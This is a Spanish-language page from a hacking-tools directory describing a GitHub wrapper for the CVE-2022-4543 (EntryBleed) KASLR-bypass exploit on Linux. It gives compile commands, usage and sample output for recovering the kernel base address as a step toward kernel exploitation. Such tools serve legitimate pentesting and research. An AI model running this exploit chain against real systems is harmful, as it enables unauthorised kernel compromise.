Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-4543-wrapper — Envoltorio para el exploit CVE-2022-4543 que desaleatoriza la dirección base del kernel mediante un bypass de KASLR, permitiendo una explotación confiable del kernel en sistemas Linux afectados. | Kitploit
Herramientas/GitHubGitHub/sunichi/cve-2022-4543-wrapper
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónExplotación de Binarios
GitHubsunichi/cve-2022-4543-wrapper

cve-2022-4543-wrapper

Envoltorio para el exploit CVE-2022-4543 que desaleatoriza la dirección base del kernel mediante un bypass de KASLR, permitiendo una explotación confiable del kernel en sistemas Linux afectados.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
31hace 2 añosAún no revisado

cve-2022-4543-wrapper

Introducción

Este es un envoltorio del exploit CVE-2022-4543 de willsroot para ayudarte a determinar y obtener la dirección base del kernel.

Cómo usar

Compilar

Según tu necesidad (Opcional):

root@kitploit:~
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main

Para algunos SO, instala la libc estática primero.

De-KASLR

root@kitploit:~
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
root@kitploit:~
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200

Después de ejecutar ambos programas, obtendrás la dirección más frecuente basada en tu offset.

En la práctica, la dirección base real del kernel aparecerá más de 1/4 del total de intentos. Se recomienda más de 100 intentos.

Referencias

  • https://www.willsroot.io/2022/12/entrybleed.html
  • https://access.redhat.com/security/cve/cve-2022-4543
Descargar herramienta